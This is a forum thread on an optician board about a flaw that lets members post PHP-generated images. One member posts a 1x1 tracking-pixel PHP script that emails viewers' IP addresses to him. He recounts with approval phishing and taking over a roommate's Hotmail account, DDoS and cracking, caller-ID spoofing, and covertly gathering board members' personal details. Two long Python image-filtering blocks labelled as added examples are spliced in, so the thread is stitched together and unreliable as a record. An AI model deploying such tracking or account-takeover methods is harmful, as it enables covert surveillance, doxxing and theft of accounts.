Thread: Board Exploit!

  1. #1
    HarryChiling (ATO Member) | Join Date: Apr 2005 | Location: Nowhereville | Occupation: Other Eyecare-Related Field | Posts: 7,765

    Board Exploit!

    I was working on a project a while back where I was creating an image using PHP. Well, I posted it here on this board with an image tag and, lo and behold, the extension .php was accepted in an image tag. Then I got to thinking: what if I was to create an image hosted on my server that would capture an IP address and save it to a database? Then anyone that looked at my picture would be unknowingly allowing me direct access to their computer. (Of course further exploits would have to be utilized, sniff sniff.) Anyway, then I got to thinking, how would I target my tool more precisely? Well, then it rang a bell: if I sent this image to one person only in a PM, then I could potentially grab IP addresses from targeted people.

    Is there any way of turning off .php extensions in the image tags?
    1st* HTML5 Tracer Software
    1st Mac Compatible Tracer Software
    1st Linux Compatible Tracer Software

    *Dave at OptiVision has a web based tracer integration package that's awesome.

  2. #2
    DragonLensmanWV (Master OptiBoarder, OptiBoard Gold Supporter) | Join Date: Oct 2006 | Location: The Greatest Nation | Occupation: Optical Retail | Posts: 7,645

    Quote Originally Posted by HarryChiling:
        I was working on a project a while back where I was creating an image using PHP. Well, I posted it here on this board with an image tag and, lo and behold, the extension .php was accepted in an image tag. Then I got to thinking: what if I was to create an image hosted on my server that would capture an IP address and save it to a database? Then anyone that looked at my picture would be unknowingly allowing me direct access to their computer. (Of course further exploits would have to be utilized, sniff sniff.) Anyway, then I got to thinking, how would I target my tool more precisely? Well, then it rang a bell: if I sent this image to one person only in a PM, then I could potentially grab IP addresses from targeted people.

        Is there any way of turning off .php extensions in the image tags?

    Did you ever read the one about where this n00b hacker was in an online forum threatening to destroy the other guys' computers? He was boasting that he had all the latest hacker toolz and was taunting the guys to reveal their IP addresses so he could format their drives. One guy gave him "his" IP address of 127.0.0.1. Then the hacker gleefully launched his attack - "there goes your drive E:, there goes your drive D:, there goes your drive C:......user offline"
    I just about busted a gut! The next day the guy came back. "I don't know what you guys did, but my computer crashed and I got it back online so here I go again!" "There goes your E: drive, ....." In the words of Red Forman, "DUMBASS!"
    DragonlensmanWV N.A.O.L.
    "There is nothing patriotic about hating your government or pretending you can hate your government but love your country."

  3. #3
    HarryChiling (ATO Member) | Join Date: Apr 2005 | Location: Nowhereville | Occupation: Other Eyecare-Related Field | Posts: 7,765

    Quote Originally Posted by DragonLensmanWV:
        Did you ever read the one about where this n00b hacker was in an online forum threatening to destroy the other guys' computers? He was boasting that he had all the latest hacker toolz and was taunting the guys to reveal their IP addresses so he could format their drives. One guy gave him "his" IP address of 127.0.0.1. Then the hacker gleefully launched his attack - "there goes your drive E:, there goes your drive D:, there goes your drive C:......user offline"
        I just about busted a gut! The next day the guy came back. "I don't know what you guys did, but my computer crashed and I got it back online so here I go again!" "There goes your E: drive, ....." In the words of Red Forman, "DUMBASS!"

    No, never heard that one, but back in the earlier days of Yahoo's instant messenger the program had a vulnerability with the buffer, so you could send a string of special characters which count as many more than are displayed, and if you sent enough of them the program crashed and after a while the dreaded blue screen. I had made a few programs that exploited this and used to just throw people out of chat rooms all the time. I had participated in a few DDoS attacks before and used to belong to Black Code before they closed down about three years ago. I focused more on cracking than hacking. I still have a few pieces of software that I cracked and provided patches for. One of them actually went out of business even though they had a great piece of software which I still use. I was younger then and more naive; now I see the error in my ways and still at times see flaws in code, but I am more interested in correcting them than exploiting them.

    The funniest story of a hack I did was a combination hack/phishing scam. My wife's roommate in college had a Hotmail account, and at one point through Hotmail you could run JavaScript commands if you were to use the character codes for one of the letters in the JavaScript statement, which Microsoft wasn't hip to. So I made an exact copy of the Microsoft Passport login on my servers that collected and e-mailed me the data and then used a popup window to display the fake prompt to her account in an e-mail. She opened it and thought she was logging into her account, but the popup just went away and she assumed all was well. Anyway, the reason I did this was that she was constantly bugging my wife and it was finals, so I changed all her passwords and the security question to her account along with the address and phone number she signed up with. You should have seen her; for a week she was on the phone with Microsoft swearing that it was really her account. Anyway, after finals I gave her the password and told her to never trust a popup like that again. She was pissed at me, but ultimately she wanted me to do it to everyone she knew that had a Hotmail account.

    Another great exploit was the caller ID exploit on T-Mobile and other cellular networks. You could set up a Linux Asterisk server to act as a phone company in essence and send fake caller ID information. Well, at one point I had an old computer set up to do this and would call my buddies up on their cell phones using their cell phone number in the caller ID field and voilà, I would automatically be in their voice mail. I would leave messages on their phone in the outgoing message so that when other people called their phone they would hear my voicemail message to them. I had two of my buddies convinced that their phones were busted; it was hilarious. This scheme is also being used now by skimmers who would take and sign up for credit cards and then activate them to your home by sending spoofed caller ID data to the activation line; most of the credit card companies wouldn't even blink an eye at the address change if the phone number remained the same.

  4. #4
    Leo Hadley Jr (Vision Equipment, OptiBoard Corporate Sponsor) | Join Date: Mar 2003 | Location: Florida | Occupation: Other Optical Manufacturer or Vendor | Posts: 1,664

    Wow, nice to see an old school hacker.
    Maybe that explains all your reputation points .......lol

    Leo Hadley Jr
    Vision Equipment
    T: 855.776.2020

    www.visionequipmentinc.com

  5. #5
    xiaowei (Bad address email on file) | Join Date: Jul 2006 | Location: Germany | Occupation: Other Optical Manufacturer or Vendor | Posts: 150

    Quote Originally Posted by HarryChiling:
        I was working on a project a while back where I was creating an image using PHP. Well, I posted it here on this board with an image tag and, lo and behold, the extension .php was accepted in an image tag. Then I got to thinking: what if I was to create an image hosted on my server that would capture an IP address and save it to a database? Then anyone that looked at my picture would be unknowingly allowing me direct access to their computer. (Of course further exploits would have to be utilized, sniff sniff.) Anyway, then I got to thinking, how would I target my tool more precisely? Well, then it rang a bell: if I sent this image to one person only in a PM, then I could potentially grab IP addresses from targeted people.

        Is there any way of turning off .php extensions in the image tags?

    If you have full control of your server, you don't need any special script to capture IP addresses; almost any WWW server will log who accessed the files it serves (and when, etc.) and hence reveal the IP address of the client, or at least its masqueraded address (if it is via a masquerading router, as with most cases of local networks today).

    "Grabbing" IP addresses via personal mail that contains images has been used for a while, especially for spam mail. This is not so much because it is a security hole (it's not, if the computer is configured reasonably; without giving the IP address at least to the respective server, no data could ever be sent back!!) but because it can be conveniently used as a "reading confirmation".

    To do this, the URL of the image in the personal mail is combined with a unique ID that is different for every mail address sent to. So the spammer can distinguish spam that reached its target and was even viewed at once from other targets where the spam was lost, and "optimize" further spamming.

    Therefore, most new mail clients will not automatically display images embedded in incoming mail, if not from known "good" senders.
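    The read-confirmation mechanism described in this post, seen from the receiving side, as an added example that is not part of the thread or of any mail client's code: a filter that classifies every image in an HTML message, renders attached (cid:) and inline (data:) images, and refuses to auto-load remote http(s) images unless the sender is on a trusted list. It goes slightly beyond the post in one respect: a remote image that looks like a beacon (1x1, hidden, or carrying a query-string token, the "unique ID" the post mentions) is blocked even for trusted senders. The sample message, the addresses in it and the data-blocked-src attribute are constructed for the demonstration.

```python
"""Mail-client-side remote image filter (added example, constructed data).

- cid: (attached) and data: (inline) images render; nothing leaves the machine.
- http(s) images are "remote": loading one sends the reader's IP address and
  the URL's per-recipient token to the sender's server, so they are blocked
  unless the sender is trusted.
- Beacon-like remote images (1x1, hidden, or tokenised) are blocked even for
  trusted senders.
"""
from html import escape
from html.parser import HTMLParser
from typing import Dict, List, Optional, Tuple
from urllib.parse import urlsplit


class _ImgCollector(HTMLParser):
    """Collect the raw text and attributes of every <img> start tag."""

    def __init__(self) -> None:
        super().__init__()
        self.images: List[Tuple[str, Dict[str, Optional[str]]]] = []

    def handle_starttag(self, tag, attrs):
        if tag == "img":
            self.images.append((self.get_starttag_text(), dict(attrs)))


def _as_int(value: Optional[str]) -> Optional[int]:
    """Parse a width/height attribute such as "1" or "300px"; None if absent."""
    try:
        return int(str(value).strip().rstrip("px"))
    except (TypeError, ValueError):
        return None


def classify_image(attrs: Dict[str, Optional[str]]) -> Tuple[str, bool]:
    """Return (kind, beacon_like) for one <img> tag's attributes."""
    src = (attrs.get("src") or "").strip()
    parts = urlsplit(src)
    scheme = parts.scheme.lower()
    if scheme == "cid":
        return "attached", False
    if scheme == "data":
        return "inline", False
    if scheme not in ("http", "https"):
        return "other", False
    width, height = _as_int(attrs.get("width")), _as_int(attrs.get("height"))
    tiny = (width is not None and width <= 1) or (height is not None and height <= 1)
    hidden = "display:none" in (attrs.get("style") or "").replace(" ", "").lower()
    tokenised = bool(parts.query)  # unique ID per recipient, as the post describes
    return "remote", tiny or hidden or tokenised


def filter_message(html: str, sender: str,
                   trusted_senders=()) -> Tuple[str, List[Dict[str, object]]]:
    """Rewrite the HTML so blocked images never load; return (html, report)."""
    collector = _ImgCollector()
    collector.feed(html)
    collector.close()
    trusted = sender.lower() in {s.lower() for s in trusted_senders}
    report: List[Dict[str, object]] = []
    rewritten = html
    for raw_tag, attrs in collector.images:
        kind, beacon = classify_image(attrs)
        load = kind != "remote" or (trusted and not beacon)
        report.append({"src": attrs.get("src") or "", "kind": kind,
                       "beacon": beacon, "loaded": load})
        if not load:
            # Keep the URL in a data attribute for an explicit "load images"
            # action, but never in src, so the client fetches nothing by itself.
            blocked_src = escape(attrs.get("src") or "", quote=True)
            placeholder = (f'<img alt="[remote image blocked]" '
                           f'data-blocked-src="{blocked_src}">')
            rewritten = rewritten.replace(raw_tag, placeholder, 1)
    return rewritten, report


# Constructed sample message: an attached logo, a tokenised 1x1 tracking pixel,
# an ordinary remote photo, and an inline data: image.
SAMPLE_HTML = """<html><body>
<p>Hello Alice, your order has shipped.</p>
<img src="cid:logo@example.org" alt="logo">
<img src="https://mail.example.net/open.gif?u=4f3c2a&amp;m=1187" width="1" height="1">
<img src="https://photos.example.org/sale.jpg" width="300" height="120" alt="sale">
<img src="data:image/gif;base64,R0lGODlhAQABAAAAACw=" alt="inline">
</body></html>"""

if __name__ == "__main__":
    safe_html, verdicts = filter_message(SAMPLE_HTML, "orders@example.org")
    for verdict in verdicts:
        print(verdict)
    print(safe_html)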

  6. #6
    HarryChiling (ATO Member) | Join Date: Apr 2005 | Location: Nowhereville | Occupation: Other Eyecare-Related Field | Posts: 7,765

    Quote Originally Posted by xiaowei:
        If you have full control of your server, you don't need any special script to capture IP addresses; almost any WWW server will log who accessed the files it serves (and when, etc.) and hence reveal the IP address of the client, or at least its masqueraded address (if it is via a masquerading router, as with most cases of local networks today).

        "Grabbing" IP addresses via personal mail that contains images has been used for a while, especially for spam mail. This is not so much because it is a security hole (it's not, if the computer is configured reasonably; without giving the IP address at least to the respective server, no data could ever be sent back!!) but because it can be conveniently used as a "reading confirmation".

        To do this, the URL of the image in the personal mail is combined with a unique ID that is different for every mail address sent to. So the spammer can distinguish spam that reached its target and was even viewed at once from other targets where the spam was lost, and "optimize" further spamming.

        Therefore, most new mail clients will not automatically display images embedded in incoming mail, if not from known "good" senders.

    Very true; however, by way of the PM system certain individuals can be targeted, and the information could be used along with clues in the person's posts to find out their place of employment and addresses. I just thought I would bring it up. I have been using it for years on boards, and oftentimes people here have been amazed that I can come up with so much info about them so quickly, and this is how.

  7. #7
    migsopt (OptiBoard Apprentice) | Join Date: Nov 2008 | Location: South East Florida | Occupation: Dispensing Optician | Posts: 29

    Priceless

    Quote Originally Posted by DragonLensmanWV:
        Did you ever read the one about where this n00b hacker was in an online forum threatening to destroy the other guys' computers? He was boasting that he had all the latest hacker toolz and was taunting the guys to reveal their IP addresses so he could format their drives. One guy gave him "his" IP address of 127.0.0.1. Then the hacker gleefully launched his attack - "there goes your drive E:, there goes your drive D:, there goes your drive C:......user offline"
        I just about busted a gut! The next day the guy came back. "I don't know what you guys did, but my computer crashed and I got it back online so here I go again!" "There goes your E: drive, ....." In the words of Red Forman, "DUMBASS!"

    That is hilarious. Must have been a very noob hacker not to know that 127.0.0.1 is the local machine. Thanks for the chuckle.

  8. #8
    HarryChiling (ATO Member) | Join Date: Apr 2005 | Location: Nowhereville | Occupation: Other Eyecare-Related Field | Posts: 7,765

    Quote Originally Posted by migsopt:
        That is hilarious. Must have been a very noob hacker not to know that 127.0.0.1 is the local machine. Thanks for the chuckle.

    Another funny thing to do with the local machine is to set your hosts file so that certain frequently visited sites point back to the local machine. I did that in the office when one employee was spending all her time on the computer; I took and pointed the hosts files in the office to 127.0.0.1 for all the sites she frequented, and amazingly she up and quit in a few months.

  9. #9
    Steve Machol (Forever Liz's Dad) | Join Date: Apr 2000 | Location: Back in AZ | Occupation: Other Eyecare-Related Field | Posts: 10,341

    Quote Originally Posted by HarryChiling:
        I was working on a project a while back where I was creating an image using PHP. Well, I posted it here on this board with an image tag and, lo and behold, the extension .php was accepted in an image tag. Then I got to thinking: what if I was to create an image hosted on my server that would capture an IP address and save it to a database? Then anyone that looked at my picture would be unknowingly allowing me direct access to their computer. (Of course further exploits would have to be utilized, sniff sniff.) Anyway, then I got to thinking, how would I target my tool more precisely? Well, then it rang a bell: if I sent this image to one person only in a PM, then I could potentially grab IP addresses from targeted people.

        Is there any way of turning off .php extensions in the image tags?

    Unless I'm missing something, I honestly don't see how that is any different than someone posting a link to a site with malicious code. In the end, the defense against such things is a strong firewall and trojan/virus protection on your PC.


    OptiBoard Administrator
    ----
    OptiBoard has been proudly serving the Eyecare Community since 1995.

  10. #10
    HarryChiling (ATO Member) | Join Date: Apr 2005 | Location: Nowhereville | Occupation: Other Eyecare-Related Field | Posts: 7,765

    Quote Originally Posted by Steve Machol:
        Unless I'm missing something, I honestly don't see how that is any different than someone posting a link to a site with malicious code. In the end, the defense against such things is a strong firewall and trojan/virus protection on your PC.

    True. The image would show up, though, without any user intervention, unless they choose to turn off images to make loading the forum faster. Just something I thought I'd mention to the powers that be.

    example:
    PHP Code:
    <?php
    // Define .PNG image
    header("Content-type: image/png");

    // Make the dimensions so small it's inconspicuous
    $imgWidth = 1;
    $imgHeight = 1;

    // Create image
    $image = imagecreate($imgWidth, $imgHeight);

    // Get the person's IP address and host name
    $ip = $_SERVER['REMOTE_ADDR'];
    $hs = $_SERVER['REMOTE_HOST'];

    // Simple mail script to send an e-mail with the IP address to me
    $to = "EMAIL@EMAIL.COM";
    $subject = "SUBJECT OF EMAIL";
    $body = "IP Address: $ip \nHost Name: $hs";
    mail($to, $subject, $body);

    // Output image from memory
    imagepng($image);

    // Free resources on server
    imagedestroy($image);
    ?>
    The image would only be 1 x 1 pixel and most people wouldn't be able to tell. If it was on my server, of course, I could host any malicious content I wanted. I thought there might be a way of screening the content that gets posted in the image tags so that it would block this kind of image.

    Code:
    [img]......[/img]
    Last edited by HarryChiling; 01-17-2009 at 02:02 PM.
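    The screening the post asks for, as an added example that is not part of the thread and not the board software's own code: a server-side check a forum could run over a post body before it is shown to other members. It does two things. validate_img_url() is a conservative allowlist for [img] URLs (http(s) only, no embedded credentials, no query string or fragment, no path segment with a server-side script extension, and a final segment ending in a known raster image extension), so a .php URL like the one above is refused. sniff_image_type() is for boards that re-host images instead of hotlinking them: it identifies the fetched bytes by their magic numbers rather than trusting the extension or the Content-Type header. The hostnames, sample post and byte strings are constructed for the demonstration.

```python
"""Server-side screening of [img] tags (added example, constructed data)."""
import re
from typing import Dict, List, Optional, Tuple
from urllib.parse import urlsplit

IMG_TAG_RE = re.compile(r"\[img\](.*?)\[/img\]", re.IGNORECASE | re.DOTALL)
ALLOWED_EXTENSIONS = {".png", ".gif", ".jpg", ".jpeg", ".webp"}
SCRIPT_EXTENSIONS = {".php", ".php3", ".php4", ".php5", ".phtml", ".asp",
                     ".aspx", ".jsp", ".cgi", ".pl", ".py"}
# Leading bytes of the formats in ALLOWED_EXTENSIONS (WebP is checked separately).
MAGIC = [(b"\x89PNG\r\n\x1a\n", "png"), (b"GIF87a", "gif"),
         (b"GIF89a", "gif"), (b"\xff\xd8\xff", "jpeg")]


def _extension(segment: str) -> str:
    """'.ext' of one path segment (lower-cased), or '' if it has no dot."""
    return "." + segment.rsplit(".", 1)[1].lower() if "." in segment else ""


def validate_img_url(url: str) -> Tuple[bool, str]:
    """Return (ok, reason) for a URL taken from an [img] tag."""
    url = url.strip()
    if re.search(r"[\s\x00-\x1f]", url):
        return False, "whitespace or control characters in URL"
    parts = urlsplit(url)
    if parts.scheme.lower() not in ("http", "https"):
        return False, f"scheme {parts.scheme!r} not allowed"
    if not parts.hostname:
        return False, "missing host"
    if parts.username or parts.password:
        return False, "credentials embedded in URL"
    if parts.query or parts.fragment:
        return False, "query string or fragment refused (per-viewer tokens)"
    segments = [s for s in parts.path.split("/") if s]
    # Check every segment, so /pixel.php/x.png (PATH_INFO) is caught too.
    for seg in segments:
        if _extension(seg) in SCRIPT_EXTENSIONS:
            return False, f"server-side script extension in path: {seg}"
    ext = _extension(segments[-1]) if segments else ""
    if ext not in ALLOWED_EXTENSIONS:
        return False, f"extension {ext or '(none)'} not in image allowlist"
    return True, "ok"


def sniff_image_type(data: bytes) -> Optional[str]:
    """Identify an image by its leading bytes; None for anything else (HTML,
    an error page, an empty body), whatever the URL's extension claimed."""
    for magic, kind in MAGIC:
        if data.startswith(magic):
            return kind
    if data[:4] == b"RIFF" and data[8:12] == b"WEBP":
        return "webp"
    return None


def screen_post(text: str) -> List[Dict[str, object]]:
    """One verdict per [img] tag in a post body."""
    verdicts: List[Dict[str, object]] = []
    for match in IMG_TAG_RE.finditer(text):
        url = match.group(1)
        ok, reason = validate_img_url(url)
        verdicts.append({"url": url.strip(), "allowed": ok, "reason": reason})
    return verdicts


# Constructed sample post: one legitimate image and four tags that must be refused.
SAMPLE_POST = (
    "Look at this lens: [img]https://example.org/photos/lens.png[/img]\n"
    "[img]http://poster.example/pixel.php[/img]\n"
    "[IMG]http://poster.example/pixel.php/x.png[/IMG]\n"
    "[img]https://example.org/img.png?uid=42[/img]\n"
    "[img]ftp://example.org/a.png[/img]"
)
# Constructed byte strings: the 8-byte PNG signature, and an HTML body that a
# script could return from a URL ending in .png.
PNG_BYTES = b"\x89PNG\r\n\x1a\n" + b"\x00" * 8
NOT_AN_IMAGE = b"<html><body>served from a .png URL</body></html>"

if __name__ == "__main__":
    for verdict in screen_post(SAMPLE_POST):
        print(verdict)
    print(sniff_image_type(PNG_BYTES), sniff_image_type(NOT_AN_IMAGE))
```

    The extension check only stops the obvious case: a URL rewriting rule can put a script behind a .png path, and a tracking script can return a genuine 1x1 PNG (as the snippet above does), which sniffing cannot tell apart from a harmless pixel. What actually removes the IP-disclosure problem is re-hosting: members' browsers then fetch only from the board, and the poster's server sees the board's fetcher, never the member. Disabling [img] in private messages is the cheaper option for the targeted-PM case raised earlier in the thread.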

  11. #11
    Master OptiBoarder | Join Date: Dec 2000 | Location: BeeEffEee | Occupation: Optometrist | Posts: 430
    Ahhh the memories!

  12. #12
    sharpstick777 (Master OptiBoarder) | Join Date: Jun 2008 | Location: Seattle WA | Occupation: Optical Wholesale Lab (other positions) | Posts: 3,137

    Quote Originally Posted by HarryChiling:
        Is there any way of turning off .php extensions in the image tags?

    This can be done at the server level by recompiling Apache/PHP with Secure PHP features. Any basic-level server admin should be able to accomplish it.

    1) use the latest version of Apache and PHP
    2) use the latest version of the software
    3) use secure PHP settings when recompiling Apache

    Most exploits take advantage of older software.

    Sharpstick
    Last edited by sharpstick777; 02-09-2009 at 05:29 PM.

  13. #13
    Steve Machol (Forever Liz's Dad) | Join Date: Apr 2000 | Location: Back in AZ | Occupation: Other Eyecare-Related Field | Posts: 10,341
    SecurePHP breaks a lot of other things that are needed to run this forum.



  14. #14
    Master OptiBoarder | Join Date: Dec 2000 | Location: BeeEffEee | Occupation: Optometrist | Posts: 430

    Quote Originally Posted by Steve Machol:
        SecurePHP breaks a lot of other things that are needed to run this forum.

    I think he meant to use best practices regarding the PHP configs, not necessarily the SecurePHP variant.

    -Brian
